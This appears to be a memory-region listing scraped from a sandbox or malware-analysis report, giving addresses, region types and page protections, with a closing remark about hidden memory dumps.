page read and write
|
||
579E000
|
unkown
|
page read and write
|
||
A9CC000
|
unkown
|
page read and write
|
||
370000
|
unkown
|
page read and write
|
||
1B490000
|
unkown
|
page readonly
|
||
80000
|
unkown
|
page readonly
|
||
CBF4000
|
unkown
|
page read and write
|
||
1B0000
|
unkown
|
page read and write
|
||
190000
|
unkown
|
page read and write
|
||
82FD000
|
unkown
|
page read and write
|
||
7FF0001C000
|
unkown
|
page execute and read and write
|
||
7FF001E0000
|
unkown
|
page read and write
|
||
7FF001A0000
|
unkown
|
page execute and read and write
|
||
1B500000
|
unkown
|
page read and write
|
||
6F77000
|
unkown
|
page read and write
|
||
80000
|
unkown
|
page write copy
|
||
44DE000
|
unkown
|
page read and write
|
||
303F000
|
unkown
|
page read and write
|
||
6C0000
|
unkown
|
page readonly
|
||
27A0000
|
unkown
|
page read and write
|
||
1BF5000
|
heap private
|
page read and write
|
||
231000
|
heap default
|
page read and write
|
||
33EE000
|
unkown
|
page read and write
|
||
436E000
|
unkown
|
page read and write
|
||
1C730000
|
unkown
|
page read and write
|
||
2E2F000
|
unkown
|
page read and write
|
||
2890000
|
unkown
|
page read and write
|
||
123000
|
unkown
|
page execute and read and write
|
||
2CBF000
|
unkown
|
page read and write
|
||
3719000
|
unkown
|
page read and write
|
||
44E0000
|
unkown
|
page read and write
|
||
2F98000
|
unkown
|
page read and write
|
||
8140000
|
unkown
|
page read and write
|
||
309B000
|
unkown
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
4E11000
|
unkown
|
page read and write
|
||
BD2000
|
unkown image
|
page execute and write copy
|
||
C430000
|
unkown
|
page read and write
|
||
2CE0000
|
unkown
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
2800000
|
unkown
|
page read and write
|
||
2EFE000
|
heap private
|
page read and write
|
||
7FF000D0000
|
unkown
|
page read and write
|
||
1EFD000
|
unkown
|
page execute and read and write
|
||
265C000
|
unkown
|
page read and write
|
||
7FF00160000
|
unkown
|
page execute and read and write
|
||
2AB4000
|
unkown
|
page read and write
|
||
1D30000
|
unkown
|
page readonly
|
||
1BAD0000
|
unkown
|
page read and write
|
||
1B4FA000
|
unkown
|
page read and write
|
||
600000
|
unkown
|
page read and write
|
||
820000
|
unkown
|
page execute and read and write
|
||
BD0000
|
unkown image
|
page readonly
|
||
3AC5000
|
unkown
|
page read and write
|
||
1BB0000
|
unkown
|
page readonly
|
||
710000
|
unkown
|
page execute and read and write
|
||
2BC6000
|
unkown
|
page read and write
|
||
3A71000
|
unkown
|
page read and write
|
||
6F0000
|
unkown
|
page readonly
|
||
124000
|
unkown
|
page read and write
|
||
3A27000
|
unkown
|
page read and write
|
||
316A000
|
unkown
|
page read and write
|
||
B320000
|
unkown
|
page read and write
|
||
C88000
|
unkown image
|
page execute read
|
||
480000
|
unkown
|
page read and write
|
||
E3E000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page readonly
|
||
B22F000
|
unkown
|
page read and write
|
||
2830000
|
unkown
|
page read and write
|
||
39B6000
|
unkown
|
page read and write
|
||
39C4000
|
unkown
|
page read and write
|
||
2CC0000
|
unkown
|
page read and write
|
||
1B80000
|
unkown
|
page read and write
|
||
27D6000
|
unkown
|
page read and write
|
||
2890000
|
unkown
|
page read and write
|
||
3286000
|
unkown
|
page read and write
|
||
E0000
|
unkown
|
page readonly
|
||
2CE0000
|
unkown
|
page read and write
|
||
1AF0000
|
unkown
|
page read and write
|
||
2890000
|
unkown
|
page read and write
|
||
35CD000
|
unkown
|
page read and write
|
||
B2A0000
|
heap private
|
page read and write
|
||
12CEC000
|
unkown
|
page read and write
|
||
57C000
|
unkown
|
page read and write
|
||
1BF0000
|
heap private
|
page read and write
|
||
660000
|
unkown
|
page read and write
|
||
62F2000
|
unkown
|
page readonly
|
||
1C730000
|
unkown
|
page read and write
|
||
7FF00190000
|
unkown
|
page execute and read and write
|
||
316C000
|
unkown
|
page read and write
|
||
1BD30000
|
unkown
|
page read and write
|
||
2B10000
|
heap private
|
page execute and read and write
|
||
2CB0000
|
unkown
|
page read and write
|
||
2890000
|
unkown
|
page read and write
|
||
310000
|
unkown
|
page read and write
|
||
239A000
|
unkown
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
814000
|
unkown
|
page execute and read and write
|
||
2890000
|
unkown
|
page read and write
|
||
8A0000
|
unkown
|
page execute and read and write
|
||
3341000
|
unkown
|
page read and write
|
||
BD0000
|
unkown image
|
page readonly
|
||
2BE0000
|
unkown
|
page readonly
|
||
1F5000
|
heap default
|
page read and write
|
||
BD0000
|
unkown image
|
page execute and read and write
|
||
36ED000
|
unkown
|
page read and write
|
||
2700000
|
unkown
|
page read and write
|
||
3585000
|
unkown
|
page readonly
|
||
356E000
|
unkown
|
page read and write
|
||
1E70000
|
unkown
|
page readonly
|
||
62EE000
|
unkown
|
page read and write
|
||
22F0000
|
unkown
|
page readonly
|
||
7FF000E0000
|
unkown
|
page read and write
|
||
CC36000
|
unkown
|
page read and write
|
||
12D000
|
unkown
|
page execute and read and write
|
||
5A1E000
|
unkown
|
page read and write
|
||
437000
|
unkown
|
page read and write
|
||
2060000
|
unkown
|
page read and write
|
||
AAEE000
|
unkown
|
page read and write
|
||
34BC000
|
unkown
|
page read and write
|
||
4F0000
|
unkown
|
page execute and read and write
|
||
355E000
|
unkown
|
page read and write
|
||
A3E4000
|
unkown
|
page write copy
|
||
2E6B000
|
unkown
|
page read and write
|
||
266D000
|
unkown
|
page read and write
|
||
2CF0000
|
unkown
|
page read and write
|
||
CB30000
|
unkown
|
page read and write
|
||
130000
|
unkown
|
page read and write
|
||
21B0000
|
unkown
|
page readonly
|
||
3B0B000
|
unkown
|
page read and write
|
||
2E80000
|
unkown
|
page read and write
|
||
920000
|
unkown
|
page read and write
|
||
41AD000
|
unkown
|
page read and write
|
||
2260000
|
unkown
|
page read and write
|
||
5B0000
|
unkown
|
page readonly
|
||
21E0000
|
unkown
|
page readonly
|
||
4D0000
|
heap default
|
page read and write
|
||
C89000
|
unkown image
|
page execute read
|
||
1BBDE000
|
unkown
|
page read and write
|
||
200000
|
unkown
|
page readonly
|
||
36EA000
|
unkown
|
page read and write
|
||
30EC000
|
unkown
|
page read and write
|
||
438000
|
unkown
|
page read and write
|
||
1F00000
|
unkown
|
page read and write
|
||
2A90000
|
unkown
|
page read and write
|
||
1BD30000
|
unkown
|
page read and write
|
||
888E000
|
unkown
|
page read and write
|
||
2510000
|
unkown
|
page write copy
|
||
22F7000
|
unkown
|
page readonly
|
||
1C96000
|
unkown
|
page read and write
|
||
2260000
|
unkown
|
page read and write
|
||
C88000
|
unkown image
|
page execute read
|
||
3B46000
|
unkown
|
page read and write
|
||
7FF0001A000
|
unkown
|
page execute and read and write
|
||
399000
|
heap default
|
page read and write
|
||
2E9D000
|
unkown
|
page read and write
|
||
BC50000
|
heap private
|
page read and write
|
||
7FF00200000
|
unkown
|
page execute and read and write
|
||
22F0000
|
unkown
|
page execute and read and write
|
||
7FF00112000
|
unkown
|
page execute and read and write
|
||
BD2000
|
unkown image
|
page execute and write copy
|
||
7FF001D7000
|
unkown
|
page read and write
|
||
BC55000
|
heap private
|
page read and write
|
||
31C7000
|
unkown
|
page read and write
|
||
430000
|
unkown
|
page readonly
|
||
2890000
|
unkown
|
page read and write
|
||
2F03000
|
unkown
|
page read and write
|
||
2890000
|
unkown
|
page read and write
|
||
D0000
|
heap private
|
page read and write
|
||
31CB000
|
unkown
|
page read and write
|
||
2340000
|
unkown
|
page readonly
|
||
1B44A000
|
unkown
|
page read and write
|
||
30D000
|
unkown
|
page read and write
|
||
670000
|
unkown
|
page read and write
|
||
7FF0002C000
|
unkown
|
page execute and read and write
|
||
90A5000
|
unkown
|
page readonly
|
||
2A8E000
|
unkown
|
page read and write | page guard
|
||
3188000
|
unkown
|
page read and write
|
||
3049000
|
unkown
|
page read and write
|
||
47A6000
|
unkown
|
page read and write
|
||
1B0000
|
unkown
|
page read and write
|
||
1D0000
|
heap default
|
page read and write
|
||
28F5000
|
unkown
|
page read and write
|
||
35F6000
|
unkown
|
page read and write
|
||
7FF000EA000
|
unkown
|
page execute and read and write
|
||
3802000
|
unkown
|
page readonly
|
||
3994000
|
unkown
|
page read and write
|
||
3182000
|
unkown
|
page read and write
|
||
2CC0000
|
unkown
|
page read and write
|
||
1F0000
|
heap default
|
page read and write
|
||
1C730000
|
unkown
|
page read and write
|
||
9E0000
|
unkown
|
page read and write
|
||
150000
|
heap private
|
page read and write
|
||
380000
|
heap default
|
page read and write
|
||
2D4E000
|
unkown
|
page read and write
|
||
46B8000
|
unkown
|
page read and write
|
||
3144000
|
unkown
|
page read and write
|
||
46E0000
|
unkown
|
page read and write
|
||
2060000
|
unkown
|
page readonly
|
||
43FE000
|
unkown
|
page read and write
|
||
A3C000
|
unkown
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
BD0000
|
unkown image
|
page readonly
|
||
1C0000
|
unkown
|
page readonly
|
||
352F000
|
unkown
|
page read and write
|
||
2C0000
|
unkown
|
page readonly
|
||
3365000
|
unkown
|
page read and write
|
||
6988000
|
unkown
|
page readonly
|
||
85C0000
|
unkown
|
page read and write
|
||
1A0000
|
unkown
|
page readonly
|
||
7FF000DA000
|
unkown
|
page execute and read and write
|
||
2FE8000
|
unkown
|
page read and write
|
||
1DD000
|
heap default
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
1D0000
|
heap default
|
page read and write
|
||
2B4000
|
heap default
|
page read and write
|
||
2F90000
|
unkown
|
page readonly
|
||
5CE2000
|
unkown
|
page readonly
|
||
35B4000
|
unkown
|
page read and write
|
||
1E0000
|
heap private
|
page read and write
|
||
25F2000
|
unkown
|
page read and write
|
||
7FF000E0000
|
unkown
|
page read and write
|
||
352C000
|
unkown
|
page read and write
|
||
840000
|
unkown
|
page readonly
|
||
67E000
|
unkown
|
page read and write
|
||
2260000
|
unkown
|
page read and write
|
||
D6000
|
unkown
|
page read and write
|
||
497000
|
heap default
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
2ED0000
|
unkown
|
page readonly
|
||
26A0000
|
unkown
|
page readonly
|
||
C228000
|
unkown
|
page read and write
|
||
2307000
|
unkown
|
page execute and read and write
|
||
CCB2000
|
unkown
|
page read and write
|
||
2730000
|
unkown
|
page readonly
|
||
27A0000
|
unkown
|
page read and write
|
||
1AD20000
|
unkown
|
page read and write
|
||
720000
|
unkown
|
page execute and read and write
|
||
3612000
|
unkown
|
page readonly
|
||
7FF001C0000
|
unkown
|
page read and write
|
||
3052000
|
unkown
|
page read and write
|
||
200000
|
unkown
|
page readonly
|
||
12DF5000
|
unkown
|
page read and write
|
||
4AF4000
|
heap private
|
page read and write
|
||
180000
|
unkown
|
page read and write
|
||
4110000
|
unkown
|
page read and write
|
||
2CA0000
|
unkown
|
page read and write
|
||
292F000
|
unkown
|
page read and write
|
||
300000
|
unkown
|
page read and write
|
||
1C950000
|
unkown
|
page read and write
|
||
1C13000
|
heap private
|
page read and write
|
||
817000
|
unkown
|
page execute and read and write
|
||
7FF00170000
|
unkown
|
page execute and read and write
|
||
430000
|
unkown
|
page read and write
|
||
2690000
|
unkown
|
page readonly
|
||
2260000
|
unkown
|
page read and write
|
||
2A60000
|
unkown
|
page read and write
|
||
550000
|
unkown
|
page readonly
|
||
2F0D000
|
unkown
|
page read and write
|
||
B6E000
|
unkown
|
page read and write
|
||
1BD80000
|
heap private
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
1BB0000
|
unkown
|
page readonly
|
||
35D9000
|
unkown
|
page read and write
|
||
BE70000
|
unkown
|
page read and write
|
||
9668000
|
unkown
|
page readonly
|
||
BD2000
|
unkown image
|
page execute and read and write
|
||
2080000
|
unkown
|
page execute and read and write
|
||
7FF0002C000
|
unkown
|
page execute and read and write
|
||
43D0000
|
unkown
|
page write copy
|
||
35DA000
|
unkown
|
page read and write
|
||
2F09000
|
unkown
|
page read and write
|
||
680000
|
heap private
|
page execute and read and write
|
||
1FF0000
|
heap private
|
page read and write
|
||
1B0000
|
unkown
|
page read and write
|
||
7FFFFF10000
|
unkown
|
page execute and read and write
|
||
C070000
|
unkown
|
page read and write
|
||
A3DA000
|
unkown
|
page write copy
|
||
1BA72000
|
unkown
|
page read and write
|
||
4E9D000
|
unkown
|
page read and write
|
||
2E0000
|
heap private
|
page read and write
|
||
3619000
|
unkown
|
page readonly
|
||
1C950000
|
unkown
|
page read and write
|
||
5829000
|
unkown
|
page read and write
|
||
12F10000
|
unkown
|
page read and write
|
||
3555000
|
unkown
|
page read and write
|
||
9F0000
|
unkown
|
page read and write
|
||
2EED000
|
unkown
|
page read and write
|
||
2210000
|
unkown
|
page execute and read and write
|
||
A3E9000
|
unkown
|
page write copy
|
||
1C8AE000
|
unkown
|
page read and write
|
||
9BF0000
|
unkown
|
page read and write
|
||
A40000
|
unkown
|
page read and write
|
||
1BA76000
|
unkown
|
page read and write
|
||
42E000
|
unkown
|
page read and write
|
||
726D000
|
unkown
|
page read and write
|
||
1BD30000
|
unkown
|
page read and write
|
||
1BC0000
|
unkown
|
page read and write
|
||
7FF00012000
|
unkown
|
page execute and read and write
|
||
3DE000
|
heap default
|
page read and write
|
||
2260000
|
unkown
|
page read and write
|
||
31D7000
|
unkown
|
page read and write
|
||
1BD30000
|
unkown
|
page read and write
|
||
22E4000
|
heap private
|
page read and write
|
||
85F000
|
unkown
|
page read and write
|
||
58B6000
|
unkown
|
page read and write
|
||
3713000
|
unkown
|
page read and write
|
||
3B05000
|
unkown
|
page read and write
|
||
226D000
|
unkown
|
page read and write
|
||
7FF001D0000
|
unkown
|
page execute and read and write
|
||
39DD000
|
unkown
|
page read and write
|
||
2A80000
|
unkown
|
page read and write
|
||
300000
|
unkown
|
page read and write
|
||
2570000
|
unkown
|
page readonly
|
||
2F4000
|
heap private
|
page read and write
|
||
3B06000
|
unkown
|
page read and write
|
||
7040000
|
heap private
|
page read and write
|
||
29FB000
|
unkown
|
page readonly
|
||
690000
|
unkown
|
page read and write
|
||
C94000
|
unkown image
|
page readonly
|
||
660000
|
unkown
|
page read and write
|
||
1B0000
|
unkown
|
page read and write
|
||
154000
|
heap private
|
page read and write
|
||
21B0000
|
unkown
|
page read and write
|
||
4130000
|
unkown
|
page read and write
|
||
3B68000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page read and write
|
||
3161000
|
unkown
|
page read and write
|
||
2B66000
|
unkown
|
page read and write
|
||
2200000
|
unkown
|
page execute and read and write
|
||
3716000
|
unkown
|
page read and write
|
||
297000
|
heap default
|
page read and write
|
||
498E000
|
unkown
|
page read and write
|
||
13D000
|
unkown
|
page execute and read and write
|
||
1AE50000
|
unkown
|
page read and write
|
||
2890000
|
unkown
|
page read and write
|
||
294A000
|
unkown
|
page read and write
|
||
684000
|
unkown
|
page read and write
|
||
27BA000
|
unkown
|
page read and write
|
||
179000
|
unkown
|
page read and write
|
||
120000
|
unkown
|
page write copy
|
||
2E80000
|
unkown
|
page read and write
|
||
2560000
|
unkown
|
page read and write
|
||
365F000
|
unkown
|
page read and write
|
||
3558000
|
unkown
|
page read and write
|
||
7EF39000
|
unkown
|
page read and write
|
||
2EFC000
|
unkown
|
page read and write
|
||
31F000
|
unkown
|
page read and write
|
||
306B000
|
unkown
|
page read and write
|
||
96F4000
|
unkown
|
page readonly
|
||
2C8F000
|
unkown
|
page read and write
|
||
3AC2000
|
unkown
|
page read and write
|
||
2BB000
|
heap default
|
page read and write
|
||
12DD1000
|
unkown
|
page read and write
|
||
660000
|
unkown
|
page read and write
|
||
7FF00190000
|
unkown
|
page execute and read and write
|
||
2180000
|
unkown
|
page execute and read and write
|
||
1BAA0000
|
heap private
|
page read and write
|
||
2890000
|
unkown
|
page read and write
|
||
130000
|
unkown
|
page read and write
|
||
2FEC000
|
unkown
|
page read and write
|
||
C94000
|
unkown image
|
page readonly
|
||
1B0000
|
unkown
|
page read and write
|
||
3B11000
|
unkown
|
page read and write
|
||
2380000
|
unkown
|
page execute and read and write
|
||
2B40000
|
unkown
|
page readonly
|
||
1DD000
|
heap default
|
page read and write
|
||
2890000
|
unkown
|
page read and write
|
||
440000
|
unkown
|
page read and write
|
||
35E0000
|
unkown
|
page read and write
|
||
29FE000
|
unkown
|
page read and write
|
||
3312000
|
unkown
|
page readonly
|
||
2FF9000
|
unkown
|
page read and write
|
||
30CF000
|
unkown
|
page read and write
|
||
22A0000
|
unkown
|
page readonly
|
||
3C89000
|
unkown
|
page read and write
|
||
7FF00102000
|
unkown
|
page execute and read and write
|
||
2F9F000
|
unkown
|
page read and write
|
||
2CEF000
|
unkown
|
page read and write
|
||
23FD000
|
unkown
|
page read and write
|
||
35E5000
|
unkown
|
page readonly
|
||
67DE000
|
unkown
|
page read and write
|
||
1DF0000
|
unkown
|
page readonly
|
||
2F90000
|
unkown
|
page readonly
|
||
1BD30000
|
unkown
|
page read and write
|
||
2520000
|
unkown
|
page readonly
|
||
1BE0000
|
unkown
|
page read and write
|
||
399C000
|
unkown
|
page read and write
|
||
2260000
|
unkown
|
page read and write
|
||
310000
|
unkown
|
page read and write
|
||
C6D7000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
2FAC000
|
unkown
|
page read and write
|
||
41C000
|
heap default
|
page read and write
|
||
1B510000
|
unkown
|
page readonly
|
||
A330000
|
unkown
|
page write copy
|
||
660000
|
unkown
|
page read and write
|
||
318E000
|
unkown
|
page read and write
|
||
4070000
|
unkown
|
page readonly
|
||
4B4E000
|
unkown
|
page read and write
|
||
35F9000
|
unkown
|
page readonly
|
||
1EF0000
|
unkown
|
page execute and read and write
|
||
1C0000
|
unkown
|
page readonly
|
||
2B60000
|
unkown
|
page read and write
|
||
2CF0000
|
unkown
|
page read and write
|
||
590000
|
unkown
|
page readonly
|
||
65C000
|
unkown
|
page read and write
|
||
660000
|
unkown
|
page read and write
|
||
2B50000
|
unkown
|
page readonly
|
||
4ACB000
|
unkown
|
page read and write
|
||
3BA7000
|
unkown
|
page read and write
|
||
3AA3000
|
unkown
|
page read and write
|
||
1C730000
|
unkown
|
page read and write
|
||
4090000
|
heap private
|
page read and write
|
||
2260000
|
unkown
|
page read and write
|
||
2F1E000
|
unkown
|
page read and write
|
||
3AEF000
|
unkown
|
page read and write
|
||
2BC000
|
unkown
|
page read and write
|
||
3109000
|
unkown
|
page read and write
|
||
310000
|
heap default
|
page read and write
|
||
2F78000
|
unkown
|
page read and write
|
||
3197000
|
unkown
|
page read and write
|
||
3665000
|
unkown
|
page readonly
|
||
1B9D0000
|
unkown
|
page read and write
|
||
78EE000
|
unkown
|
page read and write
|
||
28B4000
|
unkown
|
page read and write
|
||
2B80000
|
unkown
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
1BD0000
|
unkown
|
page read and write
|
||
2C10000
|
unkown
|
page read and write
|
||
3990000
|
unkown
|
page read and write
|
||
2ABA000
|
heap private
|
page execute and read and write
|
||
4AF0000
|
heap private
|
page read and write
|
||
2E2E000
|
unkown
|
page read and write
|
||
1FCD000
|
unkown
|
page read and write
|
||
302E000
|
unkown
|
page read and write
|
||
12E31000
|
unkown
|
page read and write
|
||
3B98000
|
unkown
|
page read and write
|
||
7FF00180000
|
unkown
|
page read and write
|
||
393E000
|
unkown
|
page read and write
|
||
1C730000
|
unkown
|
page read and write
|
||
C8CE000
|
unkown
|
page read and write
|
||
2700000
|
unkown
|
page readonly
|
||
1BDF000
|
unkown
|
page read and write
|
||
1B41A000
|
unkown
|
page read and write
|
||
2DF1000
|
unkown
|
page read and write
|
||
1B4A6000
|
unkown
|
page read and write
|
||
2400000
|
unkown
|
page readonly
|
||
187000
|
unkown
|
page execute and read and write
|
||
4234000
|
unkown
|
page read and write
|
||
510000
|
unkown
|
page readonly
|
||
2890000
|
unkown
|
page read and write
|
||
340000
|
heap default
|
page read and write
|
||
39F0000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page read and write
|
||
304F000
|
unkown
|
page read and write
|
||
192000
|
unkown
|
page read and write
|
||
348000
|
heap default
|
page read and write
|
||
2F1A000
|
unkown
|
page read and write
|
||
1DD000
|
unkown
|
page execute and read and write
|
||
2A30000
|
unkown
|
page readonly
|
||
679000
|
unkown
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
2D30000
|
unkown
|
page read and write
|
||
2340000
|
unkown
|
page readonly
|
||
12E80000
|
unkown
|
page read and write
|
||
7FF00180000
|
unkown
|
page execute and read and write
|
||
A53E000
|
unkown
|
page read and write
|
||
CC73000
|
unkown
|
page read and write
|
||
1BF0000
|
heap private
|
page read and write
|
||
1E3000
|
heap default
|
page read and write
|
||
9E0000
|
unkown
|
page read and write
|
||
1BCF0000
|
heap private
|
page read and write
|
||
2890000
|
unkown
|
page readonly
|
||
1E00000
|
heap private
|
page read and write
|
||
CA8000
|
unkown image
|
page readonly
|
||
2E81000
|
unkown
|
page read and write
|
||
2C70000
|
unkown
|
page read and write
|
||
AA0000
|
unkown
|
page execute and read and write
|
||
F0000
|
unkown
|
page write copy
|
||
372C000
|
unkown
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
364000
|
unkown
|
page read and write
|
||
7FF00260000
|
unkown
|
page read and write
|
||
3A72000
|
unkown
|
page read and write
|
||
39EB000
|
unkown
|
page read and write
|
||
3168000
|
unkown
|
page read and write
|
||
4930000
|
unkown
|
page read and write
|
||
1B0000
|
unkown
|
page read and write
|
||
3B8000
|
heap default
|
page read and write
|
||
7FF001E0000
|
unkown
|
page read and write
|
||
1E60000
|
unkown
|
page readonly
|
||
2F0F000
|
unkown
|
page read and write
|
||
2F52000
|
unkown
|
page read and write
|
||
3A10000
|
unkown
|
page read and write
|
||
3154000
|
unkown
|
page read and write
|
||
3582000
|
unkown
|
page read and write
|
||
320000
|
heap private
|
page read and write
|
||
7FF00170000
|
unkown
|
page execute and read and write
|
||
1E9000
|
heap default
|
page read and write
|
||
480A000
|
heap private
|
page read and write
|
||
7FF00160000
|
unkown
|
page execute and read and write
|
||
8951000
|
unkown
|
page readonly
|
||
7FF00020000
|
unkown
|
page read and write
|
||
1B447000
|
unkown
|
page read and write
|
||
3679000
|
unkown
|
page readonly
|
||
30B000
|
unkown
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
3F0000
|
heap default
|
page read and write
|
||
1F5000
|
unkown
|
page read and write | page guard
|
||
1C30000
|
unkown
|
page read and write
|
||
550000
|
heap private
|
page read and write
|
||
91F000
|
unkown
|
page read and write
|
||
7FF00230000
|
unkown
|
page execute and read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
4440000
|
unkown
|
page read and write
|
||
1B5A000
|
unkown
|
page read and write
|
||
24E000
|
heap default
|
page read and write
|
||
3C40000
|
unkown
|
page readonly
|
||
1B9D0000
|
unkown
|
page read and write
|
||
1C72E000
|
unkown
|
page read and write
|
||
2E70000
|
unkown
|
page read and write
|
||
7FF000D5000
|
unkown
|
page read and write
|
||
2A60000
|
heap private
|
page execute and read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
94CF000
|
unkown
|
page readonly
|
||
2260000
|
unkown
|
page read and write
|
||
500000
|
unkown
|
page readonly
|
||
6F0000
|
unkown
|
page readonly
|
||
12F61000
|
unkown
|
page read and write
|
||
1BD0000
|
unkown
|
page read and write
|
||
8FA000
|
unkown
|
page read and write
|
||
4E34000
|
unkown
|
page read and write
|
||
1F90000
|
unkown
|
page readonly
|
||
C8A0000
|
heap private
|
page read and write
|
||
CCF0000
|
unkown
|
page read and write
|
||
1B510000
|
unkown
|
page readonly
|
||
12F72000
|
unkown
|
page read and write
|
||
420000
|
unkown
|
page read and write
|
||
AFC0000
|
heap private
|
page read and write
|
||
2666000
|
unkown
|
page read and write
|
||
2260000
|
unkown
|
page read and write
|
||
43AE000
|
unkown
|
page read and write
|
||
CBB0000
|
unkown
|
page read and write
|
||
600000
|
unkown
|
page read and write
|
||
3B83000
|
unkown
|
page read and write
|
||
A40000
|
unkown
|
page read and write
|
||
1B950000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
7FF001A0000
|
unkown
|
page read and write
|
||
1E0000
|
unkown
|
page read and write
|
||
316D000
|
unkown
|
page read and write
|
||
2EF9000
|
heap private
|
page read and write
|
||
A20000
|
unkown
|
page execute and read and write
|
||
1B80000
|
unkown
|
page read and write
|
||
24B0000
|
unkown
|
page write copy
|
||
2E5F000
|
unkown
|
page read and write
|
||
3532000
|
unkown
|
page read and write
|
||
1FF7000
|
unkown
|
page read and write
|
||
3898000
|
unkown
|
page read and write
|
||
225000
|
heap private
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
370000
|
unkown
|
page read and write
|
||
27B0000
|
unkown
|
page read and write
|
||
7FF00022000
|
unkown
|
page execute and read and write
|
||
3328000
|
unkown
|
page read and write
|
||
CA8000
|
unkown image
|
page readonly
|
||
9475000
|
unkown
|
page readonly
|
||
3036000
|
unkown
|
page read and write
|
||
BD0000
|
unkown image
|
page readonly
|
||
C88000
|
unkown image
|
page execute read
|
||
2890000
|
unkown
|
page read and write
|
||
29A0000
|
heap private
|
page read and write
|
||
2F3E000
|
unkown
|
page read and write
|
||
540000
|
unkown
|
page readonly
|
||
2570000
|
unkown
|
page readonly
|
There are 1698 hidden memdumps, click here to show them.